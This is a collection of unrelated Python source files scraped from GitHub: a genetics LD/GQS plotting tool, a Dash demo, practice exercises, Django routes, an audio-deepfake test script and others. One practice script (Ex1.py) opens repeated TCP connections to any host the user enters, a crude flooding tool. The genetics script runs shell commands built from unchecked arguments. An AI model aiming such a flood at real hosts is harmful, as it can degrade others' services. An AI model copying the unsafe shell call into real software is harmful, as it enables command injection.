help=\"Column name for the SNP position in the input file\")\nparser.add_argument('--ld_h', default=None, type=str, help=\"Column name for the LD in the input file\")\nparser.add_argument('--refG', default=None, type=str, choices=['genome1000-EUR','genome1000-EAS','HRC-EUR','HRC-EAS'], help='Reference Panel')\nparser.add_argument('--addout',default=None, type=str, help='prefix for the output files')\n\ndef sort_args(opts):\n \"\"\" Maps the column names\"\"\"\n cols_opts = [\n [opts['chrm_h'], 'CHR'],\n [opts['snp_h'], 'SNP'],\n [opts['pval_h'],'PVAL'],\n [opts['ld_h'], 'RSQR'],\n [opts['pos_h'], 'POS'],\n ]\n col_dict = {x[0]: x[1] for x in cols_opts if x[0] is not None}\n col_list=list(col_dict.keys())\n return [col_dict, col_list]\n\ndef read_ifile(ifile,col_list, col_dict):\n \"\"\"Try to read the file correctly\"\"\"\n try:\n data = pd.read_csv(ifile, delim_whitespace=True, usecols=col_list)\n data=data.rename(columns=col_dict)\n return (data)\n except ValueError:\n raise ValueError('One of these columns did not matched to the header\\n'+'\\n'.join(col_list))\n\ndef verify_chr(data,chrm):\n \"\"\"Interpret the chromosome number from the file or verify the entered one\"\"\"\n chr_list=['1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20','21','22']\n if chrm is not None:\n if chrm in chr_list:\n chrm=chrm\n else:\n raise ValueError('Not a valid chromosome number')\n\n else:\n nchrm=data.CHR.value_counts().rename_axis('unique_values').reset_index(name='counts')\n if nchrm.shape[0]>1:\n raise ValueError('Column contains more than one possible chromosome?')\n\n else:\n chrm=np.str(nchrm['unique_values'].values[0])\n if chrm in chr_list:\n chrm=chrm\n else:\n raise ValueError('Not a valid chromosome number')\n return chrm\n\nclass Logger(object):\n \"\"\"Generate log files\"\"\"\n def __init__(self, fh):\n self.log_fh = open(fh, 'a')\n def log(self, msg):\n self.log_fh.write(msg)\n\ndef ld_filter(data,r2_th):\n \"\"\"Filter in LD threshold return excluded and not included data\"\"\"\n P1_index = data[data['RSQR'] > r2_th].index\n P2_index = data[data['RSQR'] <=r2_th].index\n data_inc = data.loc[P1_index]\n data_exc = data.loc[P2_index]\n data_exc.to_csv(addout+'_exc.r2th.txt', index=None, sep='\\t')\n data_inc.to_csv(addout+'_for.plot.txt', index=None, sep='\\t')\n return data_inc, data_exc\n\ndef get_index(bol, data):\n \"\"\"Try to find index SNP\"\"\"\n if bol is None:\n index=data.nsmallest(1,'PVAL', keep='first')\n return [index.SNP.values[0], index.PVAL.values[0]]\n else:\n index=data[data['RSQR']==1]\n index=index.nsmallest(1,'PVAL', keep='first')\n return [index.SNP.values[0], index.PVAL.values[0],index.PVAL_L.values[0]]\n\ndef calc_slope(cord):\n \"\"\"Calculates slope of line\"\"\"\n x1=cord[0][0]; y1=cord[0][1]; x2=cord[1][0]; y2=cord[1][1]\n m=(y2-y1)/(x2-x1); i=y1-(m*x1)\n return [m,i]\n\ndef shortest_dist(line,p):\n \"\"\"Calcualtes shortest distance between two points on 2D space\"\"\"\n m1=line[0]; i1=line[1]; x2=p[0]; y2=p[1]\n m2=-1/line[0]; i2=y2-(m2*x2)\n x_meet=(i2-i1)/(m1-m2); y_meet=m2*x_meet+i2\n dist=np.round(np.sqrt((x_meet-x2)**2+(y_meet-y2)**2),3)\n return dist\n\ndef color_code(index_snp, data):\n \"\"\"Assigns color for the scatter plot\"\"\"\n # different quantile of absolute residuals\n P68 = data['2*RESID'].quantile(q1); P95 = data['2*RESID'].quantile(q2); P99 = data['2*RESID'].quantile(q3)\n # Colours codes 68%,95%,99%\n data['Colors'] = np.where(data['2*RESID'] >= P68, 'red', 'black')\n data.loc[(data['2*RESID'] >= P68) & (data['2*RESID'] < P95), 'Colors'] = 'green'\n data.loc[(data['2*RESID'] >= P95) & (data['2*RESID'] < P99), 'Colors'] = 'orange'\n data.loc[data['SNP'] == index_snp[0], 'Colors'] = 'magenta' # index snp\n # directions\n data['SIGN'] = np.where(data.RESID > 0, '+', '-')\n data.loc[data.RESID == 0, 'SIGN'] = '0'\n ##areas\n data = data.sort_values(['PVAL_L_PRED'])\n data['Up68'] = np.round(data['PVAL_L_PRED'] + P68, 3); data['Lo68'] = np.round(data['PVAL_L_PRED'] - P68, 3)\n data['Up95'] = np.round(data['PVAL_L_PRED'] + P95, 3); data['Lo95'] = np.round(data['PVAL_L_PRED'] - P95, 3)\n data['Up99'] = np.round(data['PVAL_L_PRED'] + P99, 3); data['Lo99'] = np.round(data['PVAL_L_PRED'] - P99, 3)\n return data\n\ndef prep_gqs(data):\n \"\"\"Estimates necessary parameters for calculating GQS\"\"\"\n data['PVAL_L'] = np.round(-np.log10(data['PVAL']), 3) # negative log of p-values\n index_snp=get_index(True, data) # index snp\n b_cord=[(0, 0), (1, index_snp[2])] # line of the orgin and index snp\n b_m, b_i = calc_slope(b_cord)\n\n data['PVAL_L_PRED'] = np.round(data['RSQR']*b_m + b_i, 3) # expected 'PVAL_L' according to the above line\n data['RESID'] = np.round(data['PVAL_L'] - data['PVAL_L_PRED'], 3) # residuals\n data['2*RESID'] = np.round(np.sqrt(data['RESID']*data['RESID']), 3) # absolute values of residuals\n data=color_code(index_snp, data)\n\n # residuals/predicted p-value (i.e amount of signal lost or gain)\n data['M_RESID'] = np.round(data['RESID'] / data['PVAL_L_PRED'], 3)\n\n return index_snp, data\n\ndef data_sep(ndata):\n \"\"\"Some necessary modification for the plots\"\"\"\n ndata_pos = ndata[(ndata.SIGN == '+')].shape[0]\n ndata_neg = ndata[(ndata.SIGN == '-')].shape[0] + ndata[(ndata.SIGN == '0')].shape[0]\n\n ndata68_pos = ndata[(ndata.SIGN == '+') & (ndata.Colors == 'black')].shape[0]\n ndata68_neg = ndata[(ndata.SIGN == '-') & (ndata.Colors == 'black')].shape[0] + ndata[(ndata.SIGN == '0')].shape[0]\n\n ndata95_pos = ndata[(ndata.SIGN == '+') & (ndata.Colors == 'green')].shape[0]\n ndata95_neg = ndata[(ndata.SIGN == '-') & (ndata.Colors == 'green')].shape[0]\n\n ndata99_pos = ndata[(ndata.SIGN == '+') & (ndata.Colors == 'orange')].shape[0]\n ndata99_neg = ndata[(ndata.SIGN == '-') & (ndata.Colors == 'orange')].shape[0]\n\n ndata10_pos = ndata[(ndata.SIGN == '+') & (ndata.Colors == 'red')].shape[0]\n ndata10_neg = ndata[(ndata.SIGN == '-') & (ndata.Colors == 'red')].shape[0]\n\n return ({'ndata_pos':ndata_pos,'ndata_neg':ndata_neg,'ndata68_pos':ndata68_pos,'ndata68_neg':ndata68_neg,\\\n 'ndata95_pos':ndata95_pos,'ndata95_neg':ndata95_neg,'ndata99_pos':ndata99_pos,\\\n 'ndata99_neg':ndata99_neg,'ndata10_pos':ndata10_pos, 'ndata10_neg':ndata10_neg})\n\ndef plot_ldvsPval(ndata):\n \"\"\"Function to plot Scatter plot\"\"\"\n index = get_index(True, ndata)\n f, ax1 = plt.subplots(figsize=(10, 8))\n ax1.scatter(ndata['RSQR'],ndata['PVAL_L'], s=25, color=ndata['Colors'], label=None)\n ax1.scatter(1,index[2],s=40,marker='d',color='magenta',label=None)\n ax1.plot([1,0],[index[2],0],color='black')\n\n ##filling and colored line\n #green\n ax1.fill_between(ndata.RSQR, ndata.Lo68, ndata.Up68, color='#888888', alpha=0.30)\n lly68 = ndata.nsmallest(1, 'Lo68')['Lo68'].values; luy68 = ndata.nlargest(1, 'Lo68')['Lo68'].values\n llx68 = ndata.nsmallest(1, 'Lo68')['RSQR'].values; lux68 = ndata.nlargest(1, 'Lo68')['RSQR'].values\n ax1.plot([lux68, llx68], [luy68, lly68], color='green', linewidth=1)\n uly68 = ndata.nsmallest(1, 'Up68')['Up68'].values; uuy68 = ndata.nlargest(1, 'Up68')['Up68'].values\n ulx68 = ndata.nsmallest(1, 'Up68')['RSQR'].values; uux68 = ndata.nlargest(1, 'Up68')['RSQR'].values\n ax1.plot([uux68, ulx68], [uuy68, uly68], color='green', linewidth=1)\n #orange\n ax1.fill_between(ndata.RSQR, ndata.Lo95, ndata.Up95, color='#888888', alpha=0.20)\n lly95 = ndata.nsmallest(1, 'Lo95')['Lo95'].values; luy95 = ndata.nlargest(1, 'Lo95')['Lo95'].values\n llx95 = ndata.nsmallest(1, 'Lo95')['RSQR'].values; lux95 = ndata.nlargest(1, 'Lo95')['RSQR'].values\n ax1.plot([lux95, llx95], [luy95, lly95], color='orange', linewidth=1)\n uly95 = ndata.nsmallest(1, 'Up95')['Up95'].values; uuy95 = ndata.nlargest(1, 'Up95')['Up95'].values\n ulx95 = ndata.nsmallest(1, 'Up95')['RSQR'].values; uux95 = ndata.nlargest(1, 'Up95')['RSQR'].values\n ax1.plot([uux95, ulx95], [uuy95, uly95], color='orange', linewidth=1)\n #red\n ax1.fill_between(ndata.RSQR, ndata.Lo99, ndata.Up99, color='#888888', alpha=0.10)\n lly99 = ndata.nsmallest(1, 'Lo99')['Lo99'].values; luy99 = ndata.nlargest(1, 'Lo99')['Lo99'].values\n llx99 = ndata.nsmallest(1, 'Lo99')['RSQR'].values; lux99 = ndata.nlargest(1, 'Lo99')['RSQR'].values\n ax1.plot([lux99, llx99], [luy99, lly99], color='red', linewidth=1)\n uly99 = ndata.nsmallest(1, 'Up99')['Up99'].values; uuy99 = ndata.nlargest(1, 'Up99')['Up99'].values\n ulx99 = ndata.nsmallest(1, 'Up99')['RSQR'].values; uux99 = ndata.nlargest(1, 'Up99')['RSQR'].values\n ax1.plot([uux99, ulx99], [uuy99, uly99], color='red', linewidth=1)\n sep=data_sep(ndata)\n\n columns = ('Interval', '-SNP', '+SNP')\n cell_text = [['0', str(sep['ndata_neg']), str(sep['ndata_pos'])], ['0-68', str(sep['ndata68_neg']), str(sep['ndata68_pos'])],\n ['68-95', str(sep['ndata95_neg']), str(sep['ndata95_pos'])], ['95-99', str(sep['ndata99_neg']), str(sep['ndata99_pos'])],\n ['99-100',str(sep['ndata10_neg']), str(sep['ndata10_pos'])]]\n\n the_table2 = plt.table(cellText=cell_text, colLabels=columns, loc='upper left', cellLoc='center',\n colWidths=[0.07, 0.057, 0.060], \\\n colColours=['whitesmoke'] * 3,\n cellColours=[['whitesmoke'] * 3, ['grey'] * 3, ['green'] * 3, ['orange'] * 3, ['red'] * 3])\n\n the_table2.auto_set_font_size(False)\n the_table2.set_fontsize(11)\n the_table2.scale(1.2, 1.2)\n plt.suptitle('Index SNP: ' + index[0], fontsize=20)\n plt.suptitle('Index SNP: ' + index[0], fontsize=20)\n plt.title('r2 > '+str(args.r2_th), fontsize=18)\n\n plt.ylim(0, index[2] + 1)\n plt.xlim(0, 1.01)\n\n plt.xlabel(\"r^2\", fontsize=14)\n plt.ylabel(\"Observed (-logP)\", fontsize=14)\n plt.savefig(addout+'_R2vsPl.plot.pdf', dpi=400)\n plt.savefig(addout+'_R2vsPl.plot.png', dpi=400)\n\ndef plot_hist(ndata):\n \"\"\"Function to plot histogram\"\"\"\n n = ndata.shape[0]\n f, ax2 = plt.subplots(figsize=(10, 8))\n P68 = ndata['2*RESID'].quantile(0.68); P95 = ndata['2*RESID'].quantile(0.95)\n P99 = ndata['2*RESID'].quantile(0.99)\n index = get_index(True, ndata)\n ax2.hist(ndata['RESID'], bins=150, color='grey')\n ax2.axvline(x=0, color='black'); ax2.axvline(x=P68, color='green')\n ax2.axvline(x=-P68, color='green'); ax2.axvline(x=P95, color='orange')\n ax2.axvline(x=-P95, color='orange');ax2.axvline(x=P99, color='red')\n ax2.axvline(x=-P99, color='red')\n sep=data_sep(ndata)\n L1_per_pos = str(np.round((sep['ndata_pos'] / n) * 100, 1))\n L1_per_neg = str(np.round((sep['ndata_neg'] / n) * 100, 1))\n L168_per_pos = str(np.round((sep['ndata68_pos'] / n) * 100, 1))\n L168_per_neg = str(np.round((sep['ndata68_neg'] / n) * 100, 1))\n L195_per_pos = str(np.round((sep['ndata95_pos'] / n) * 100, 1))\n L195_per_neg = str(np.round((sep['ndata95_neg'] / n) * 100, 1))\n L199_per_pos = str(np.round((sep['ndata99_pos'] / n) * 100, 1))\n L199_per_neg = str(np.round((sep['ndata99_neg'] / n) * 100, 1))\n\n L1100_per_pos = str(np.round((sep['ndata10_pos'] / n) * 100, 1))\n L1100_per_neg = str(np.round((sep['ndata10_neg'] / n) * 100, 1))\n\n columns = ('Interval', '-SNP (%)', '+SNP (%)')\n\n cell_text = [['0', L1_per_neg, L1_per_pos], ['0-68', L168_per_neg, L168_per_pos],\n ['68-95', L195_per_neg, L195_per_pos], \\\n ['95-99', L199_per_neg, L199_per_pos], ['99-100', L1100_per_neg, L1100_per_pos]]\n\n the_table2 = plt.table(cellText=cell_text, colLabels=columns, loc='upper left', cellLoc='center',\n colWidths=[0.075, 0.09, 0.09], \\\n colColours=['whitesmoke'] * 3,\n cellColours=[['whitesmoke'] * 3, ['grey'] * 3, ['green'] * 3, ['orange'] * 3, ['red'] * 3])\n\n the_table2.auto_set_font_size(False)\n the_table2.set_fontsize(12)\n the_table2.scale(1.2, 1.2)\n plt.suptitle('Index SNP: ' + index[0], fontsize=20)\n plt.xlabel(\"RESID\", fontsize=14)\n plt.ylabel(\"Number of SNPs\", fontsize=14)\n plt.savefig(addout+'_Mresid.hist.pdf', dpi=400)\n plt.savefig(addout+'_Mresid.hist.png', dpi=400)\n\ndef mod_gqs(data):\n \"\"\"Modification for GQS plot\"\"\"\n data_index = data[data.M_RESID <= 0.0].index\n ndata = data.loc[data_index]\n #This is critcial line\n c1_m,c1_i =calc_slope(crit_cord)\n line = (c1_m, c1_i)\n pw = (1.0, 1.0) # cordinates for the worst case\n dist = shortest_dist(line, pw)\n ndata['dist_critical'] = ndata.apply(lambda row: shortest_dist(line, (row['RSQR'], -row['M_RESID'])), axis=1)\n ndata['gGQS'] = np.round((dist - ndata['dist_critical']) / dist, 3)\n\n ndata['M_RESID_pred'] = np.round((c1_m * ndata['RSQR'] + c1_i), 3)\n ndata['Rdist'] = np.round(abs(ndata['M_RESID']) - ndata['M_RESID_pred'], 3)\n ndata['Colors2'] = np.where(ndata['Rdist'] > 0.0, 'red', 'black')\n ndata.loc[(ndata['Rdist'] == 0.00), 'Colors2'] = 'yellow'\n\n return ndata\n\n\ndef plot_gqs(data):\n \"Function to plot GQS\"\n ndata=mod_gqs(data)\n f, ax2 = plt.subplots(figsize=(10, 8))\n ax2.scatter(ndata['RSQR'], -ndata['M_RESID'], s=30, edgecolor='black', color=ndata['Colors2'])\n plt.grid(True)\n\n nrdata_index = ndata[ndata.Colors2 == \"red\"].index\n nrdata = ndata.loc[nrdata_index]\n\n if ndata[ndata.RSQR>0.40].shape[0]<=1:\n gqs = -1\n elif nrdata.shape[0] == 0:\n gqs = 1\n else:\n\n gqs = nrdata.gGQS.min()\n gqs_index = nrdata[nrdata.gGQS == gqs].index\n gqs_df= nrdata.loc[gqs_index]\n lgqs = gqs_df.SNP.values[0]\n\n c2_i = np.abs(gqs_df['M_RESID'].values[0]) - 1 * gqs_df['RSQR'].values[0]\n x_corr = (c2_i - 1.4) /-2\n y_corr = -1.0 * x_corr + 1.4\n ax2.plot([gqs_df['RSQR'].values[0], x_corr], [np.abs(gqs_df['M_RESID'].values[0]), y_corr], linestyle='--',\n color='coral')\n ax2.text(gqs_df['RSQR'].values[0], np.abs(gqs_df['M_RESID'].values[0]), lgqs)\n gqs = np.round(gqs, 3)\n ax2.plot([0.4, 1], [1, 0.4], linestyle='-', color='black')\n ax2.plot([1, 0.7], [1, 0.7], linestyle='--', color='black')\n\n plt.ylim(0, 1.01)\n plt.xlim(0, 1.01)\n plt.text(.90, .95, str(nrdata.shape[0]), fontsize=20, color='b')\n\n if (gqs == -1):\n plt.text(.40, 1.1, 'GQS: ' + str(gqs), fontsize=20, color='black', bbox=dict(boxstyle=\"round\", fc='red'))\n elif(gqs == 1):\n plt.text(.40, 1.1, 'GQS: ' + str(gqs), fontsize=20, color='black', bbox=dict(boxstyle=\"round\", fc='green'))\n else:\n plt.text(.40, 1.1, 'GQS: ' + str(gqs), fontsize=20, color='black', bbox=dict(boxstyle=\"round\", fc='red'))\n\n plt.title('r^2 > '+str(args.r2_th), fontsize=18)\n plt.xlabel(\"r^2\", fontsize=14)\n plt.ylabel(\"signal lost\", fontsize=14)\n\n data.to_csv(addout+'_full.plot.txt',index=None, sep='\\t')\n ndata.to_csv(addout + '_gqs.plot.txt', index=None, sep='\\t')\n plt.savefig(addout+'_GqsVis.plot.pdf', dpi=400)\n plt.savefig(addout+'_GqsVis.plot.png', dpi=400)\n return [str(gqs),str(nrdata.shape[0])]\n\ndef cal_ld(ref_path, plink_path, chrm, data):\n \"\"\"Calculate LD for each SNP w.r.t index using PLINK: Might need some work; Currently look for patter 'chr1'\"\"\"\n content=os.listdir(ref_path)\n r1 = re.compile(\".*chr\"+chrm+\"[.|_].*fam\") ##search patern--> chr1#\n fam_file = list(filter(r1.match, content))\n pref='.'.join(fam_file[0].split('.')[:-1])\n index=get_index(None, data)\n cmd1=plink_path+'plink --bfile '+ref_path+pref+' --r2 --ld-snp '+index[0]+' --ld-window-kb 1000 --ld-window 99999 --ld-window-r2 0 --out '+addout\n proc1=subprocess.Popen(cmd1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n (out, err) = proc1.communicate()\n if not err.decode(\"utf-8\").strip():\n pass\n else:\n raise ValueError('Are you sure the chromosome number is correct for this region/file')\n\n ld_info=pd.read_table(addout+'.ld', delim_whitespace=True)\n data_merge=pd.merge(data,ld_info,left_on=['SNP'],right_on=['SNP_B'],how='left')\n data_merge=data_merge[['SNP','PVAL','R2']]; data_merge.columns=['SNP','PVAL','RSQR']\n data_excl=data_merge[data_merge['RSQR'].isnull()]\n data_plot=data_merge[data_merge['RSQR'].notnull()]\n data_excl.to_csv(addout+'_exc.mis.ref.txt', index=None, sep='\\t')\n return data_plot, data_excl\n\ndef create_config(name):\n \"\"\"Setup configuration file: Might need some work for on other system\"\"\"\n cwd = os.getcwd()\n if not os.path.exists(cwd+'/'+name):\n open(cwd+'/'+name,'w+')\n #os.mknod(cwd+'/'+name)\n plink_loc = input(\"Enter the location of plink tool: \")\n genome1000EUR_loc = input(\"Enter the location of genome1000-EUR: \")\n genome1000EAS_loc = input(\"Enter the location of genome1000-EAS: \")\n HRCEUR_loc = input(\"Enter the location of HRC-EUR: \")\n HRCEAS_loc = input(\"Enter the location of HRC-EAS: \")\n lw1='plink_loc '+plink_loc+'\\ngenome1000-EUR_loc '+genome1000EUR_loc+'\\ngenome1000-EAS_loc '+\\\n genome1000EAS_loc+'\\nHRC-EUR_loc '+HRCEUR_loc+'\\nHRC-EAS_loc '+HRCEAS_loc\n fw1=open(name,'a');fw1.write(lw1);fw1.close()\n sys.exit('Restart the script!')\n else:\n gqs_config={}\n with open(name, 'r') as f:\n for line in f:\n line=line.strip().split(' ')\n gqs_config[line[0]]=line[1]\n f.close()\n return gqs_config\n\ndef read_locus(data, chrm, start, end):\n \"\"\"Seperate defined locus from summary statistic\"\"\"\n locus_data=data[(data['CHR']==int(chrm)) & (data['POS']>=int(start)) & (data['POS']<=int(end))]\n if locus_data.shape[0]==0:\n None\n else:\n return locus_data\ndef run_steps(data):\n \"\"\"Sub function that call plot functions\"\"\"\n data_inc, data_exc2 = ld_filter(data, opts['r2_th'])\n if data_inc.shape[0] < nth:\n raise ValueError('The number of SNPs are very few after merging with the reference.\\nPlease '\n 'match the SNP identifier with the reference')\n index, ndata = prep_gqs(data_inc)\n plot_ldvsPval(ndata)\n plot_hist(ndata)\n gqs = plot_gqs(ndata)\n out_res1='File_Name\\tCHR\\tIndex_SNP\\tPvalue\\tGQS\\tOutliers\\n'\n out_res2 = args.ifile + '\\t' + chrm + '\\t' + index[0] + '\\t' + str('{:.3e}'.format(index[1])) + '\\t' + gqs[\n 0] + '\\t' + gqs[1] + '\\n'\n log_ob.log(out_res1)\n log_ob.log(out_res2)\n print(out_res1)\n print(out_res2)\n\ndef run_LD(data,chrm):\n stat = create_config('gqs_config')\n data, data_exc1 = cal_ld(stat[args.refG + '_loc'] + '/', stat['plink_loc'] + '/', chrm, data)\n if data.shape[0] < nth:\n raise ValueError('The number of SNPs are very few after merging with the reference.\\nPlease '\n 'match the SNP identifier with the reference')\n return data, data_exc1\nif __name__ == '__main__':\n args=parser.parse_args()\n if args.ifile is None:\n raise ValueError('The --ifile flag is required.')\n elif args.snp_h is None or args.pval_h is None or args.addout is None:\n raise ValueError('--snp_h, --pval_h and --addout flags are required.')\n elif args.chrm_h is None and args.chrm is None:\n raise ValueError('Either --chrm_h and --chrm flag is required.')\n elif args.ld_h is None and args.refG is None:\n raise ValueError('Either --ld_h and --refG flag is required.')\n if args.regs is not None:\n if args.pos_h is None:\n raise ValueError('--pos_h position column required to run on full sumstats')\n\n\n addout = args.addout\n opts = vars(args)\n [col_dict, col_list] = sort_args(opts)\n\n if args.regs is None:\n data = read_ifile(opts['ifile'], col_list, col_dict)\n chrm = verify_chr(data, args.chrm)\n if args.ld_h is None:\n data, data_exc1=run_LD(data,chrm)\n log_ob = Logger(addout + '.log')\n log_ob.log(DEFHEAD)\n run_steps(data)\n else:\n data = read_ifile(opts['ifile'], col_list, col_dict)\n with open(args.regs, 'r') as f1:\n addout_cont=addout; args.ifile_cont=args.ifile\n for line1 in f1:\n line1 = line1.strip().split()\n chrm = line1[0]; start = line1[1]; end = line1[2]\n addout = addout_cont + \"_\" + chrm + \"_\" + start + \"_\" + end\n args.ifile=args.ifile_cont + \"_\" + chrm + \"_\" + start + \"_\" + end\n locus_data=read_locus(data, chrm, start, end)\n\n log_ob = Logger(addout + '.log')\n log_ob.log(DEFHEAD)\n if locus_data is None:\n out_res=\"No SNPs in that range\"\n log_ob.log(out_res)\n print(\"No SNPs in that range\")\n else:\n locus_data, data_exc1 = run_LD(locus_data)\n run_steps(locus_data)\n\n\n","repo_name":"Xswapnil/GQS","sub_path":"GQSmain.py","file_name":"GQSmain.py","file_ext":"py","file_size_in_byte":22933,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32953009691","text":"# -*- coding: utf-8 -*-\n\"\"\"\n数据库初始化\n\"\"\"\nimport os\nimport sys\nfrom db import Base, eng\nfrom config import BASE_DIR\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print(\"run with 1 arg : db or file to choose the mode while initializing\")\n exit(-1)\n mode = sys.argv[1]\n if mode == 'file':\n data_dir = os.path.join(BASE_DIR, 'data')\n if not os.path.exists(data_dir):\n os.mkdir(data_dir)\n print('file mode done!')\n elif mode == 'db':\n Base.metadata.drop_all(eng) # 删除表\n Base.metadata.create_all(eng) # 建立表\n print(\"db mode done!\")\n else:\n print(\"wrong mode, run by use arg db or file!\")","repo_name":"cgDeepLearn/BilibiliCrawler","sub_path":"initial.py","file_name":"initial.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"53"} +{"seq_id":"22413942083","text":"import socket\r\nprint('1.sendig request via domain')\r\nprint('2.sendig request via IP & port')\r\nprint('========================================')\r\nnum1 = int(input('please choose number 1 or 2 ====>> '))\r\nnum2 = int(input('please Enter the request count'))\r\nif num1 == 1:\r\n url = input('so now Enter your favorite Url ====>> ')\r\n ip = socket.gethostbyname(url)\r\n UDP_PORT = 80\r\n\r\n\r\n for i in range(1, num2+1):\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # tcp connection\r\n s.connect((ip, UDP_PORT))\r\n print(f'succsessfully sent the request {i}')\r\n\r\n print('the process has succsessfully Done ')\r\n s.close()\r\nif num1 == 2:\r\n ip1 = input('Enter ip ====> ')\r\n port1 = int(input('Enter port number ====>> '))\r\n\r\n\r\n for j in range(1, num2 + 1):\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # tcp connection\r\n s.connect((ip1, port1))\r\n print(f'succsessfully sent the request {j}')\r\n\r\n print('the process has succsessfully Done ')\r\n s.close()\r\n","repo_name":"Parsaahmadiafshar/some-samples-for-python","sub_path":"practice1/Ex1.py","file_name":"Ex1.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74053892327","text":"import dash\nimport dash_renderer\nimport dash_core_components as dcc\nimport dash_html_components as html\n\napp = dash.Dash()\n\napp.layout = html.Div(children=[\n html.H1('Trying out dash'),\n dcc.Graph(id='Example',\n figure={\n 'data':[{'x':[1,2,3,4,5,6,7,8],'y':[1,4,9,16,25,36,49,64],'type':'line','name':'Xars'},\n {'x':[1,2,3,4,5,6,7,8],'y':[1,3,8,15,24,35,48,63],'type':'bar','name':'Mars'}],\n 'layout': {\n 'title': 'Basic'\n\n }\n }\n\n )\n\n])\n\nif __name__=='__main__' :\n app.run_server(debug=True)\n\n","repo_name":"Shristi19/DataVisualization","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71913577128","text":"#Дано натуральное число A. Определите, каким по счету числом Фибоначчи оно является, то есть выведите такое число n, что f_n = A. Если А не является числом Фибоначчи, выведите число -1.\r\nc = int(input())\r\nf1 = 1\r\nf2 = 1\r\na = [1, 1]\r\ni = 0\r\nwhile i < 15:\r\n f_sum = f1 + f2\r\n f1 = f2\r\n f2 = f_sum\r\n a.append(f2)\r\n i = i + 1\r\nq = 0\r\nfor i in range (len(a)):\r\n if c == a[i]:\r\n print (i+1)\r\n q += 1\r\nif q == 0:\r\n print ('-1')","repo_name":"Supervlada3000/Python-HW","sub_path":"21.10.21/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5378279726","text":"from .list_node import ListNode\n\nclass ReverseLinkedList:\n def reverseList(self, head: ListNode) -> ListNode:\n cur, rev = head, None\n while cur:\n rev, rev.next, cur = cur, rev, cur.next\n return rev\n\n def reverseList2(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n if not head: return head\n prev, cur, next_ = None, head, None\n while cur:\n next_ = cur.next\n cur.next = prev\n prev = cur\n cur = next_\n return prev\n","repo_name":"yokolet/tranquil-beach-python","sub_path":"tranquil-beach/linked_list/reverse_linked_list.py","file_name":"reverse_linked_list.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70572454888","text":"\"\"\"\n@author: Saurabh.Powar\n\"\"\"\n\nimport pandas as pd\nfrom tqdm import tqdm\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom prep_dataset import SRMRDataset\nfrom crnn_model import CRNN_Model\n\nBASE_PATH = '/home/sspowar/scratch/archive/LA/LA'\n\n# Load saved model\nmodel = CRNN_Model(num_class=2, msr_size=(23, 8), rnn_hidden_size=128, dropout=0.7, tem_fac=[1, 2, 1])\nmodel.load_state_dict(torch.load(\"crnn_model_epoch_10.pt\", map_location=torch.device('cpu')))\nmodel.eval() # Set the model to evaluation mode\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nmodel.double()\nmodel.to(device)\n\n# Load test data\ntest_df = pd.read_csv(f'{BASE_PATH}/ASVspoof2019_LA_cm_protocols/ASVspoof2019.LA.cm.dev.trl.txt',\n sep=\" \", header=None)\ntest_df.columns =['speaker_id','filename','system_id','null','class_name']\ntest_df.drop(columns=['null'], inplace=True)\ntest_df['filepath'] = f'{BASE_PATH}/ASVspoof2019_LA_dev/flac/'+test_df.filename+'.flac'\ntest_df['target'] = (test_df.class_name=='spoof').astype('int32')\n\ntest_dataset = SRMRDataset(test_df)\ntest_loader = DataLoader(test_dataset, batch_size=16, shuffle=True)\n\ntotal_correct = 0\ntotal_samples = 0\n\n# Testing loop\nwith tqdm(test_loader, desc=\"Testing\") as pbar:\n for data, target in pbar:\n data, target = data.to(device), target.to(device)\n with torch.no_grad():\n output = model(data)\n predicted_labels = (output > 0.5).float() # Assuming 0.5 threshold for binary classification\n total_correct += (predicted_labels == target).sum().item()\n total_samples += target.size(0)\n\ntest_accuracy = total_correct / total_samples\nprint(f\"Test Accuracy: {test_accuracy:.4f}\")\n","repo_name":"Spnetic-5/Audio_Deepfake_Mitacs23","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17653384520","text":"from __future__ import absolute_import, unicode_literals\n\nfrom django.conf.urls import url\n\nimport project_management.views as views\n\n\nurlpatterns = [\n url(r'^$', views.InvestigationListView.as_view(),\n name='pm_investigation_list'),\n url(r'^detail/(?P[\\w-]+)$', views.InvestigationDetailView.as_view(),\n name='pm_investigation_detail'),\n url(r'^create/(?P[\\w-]+)$', views.InvestigationCreateView.as_view(),\n name='pm_investigation_create'),\n url(r'^edit/(?P[\\w-]+)$', views.InvestigationUpdateView.as_view(),\n name='pm_investigation_edit'),\n]\n","repo_name":"emergence-lab/emergence-lab","sub_path":"project_management/urls/investigations.py","file_name":"investigations.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72520164009","text":"import requests \n\nURL = \"https://pokeapi.co/api/v2/generation/1/\"\nreq = requests.get(URL)\n\n\n\nif req.status_code == 200:\n dados_rq = req.json()\n for pokemon in dados_rq['pokemon_species']:\n print(pokemon['name'])\n\n 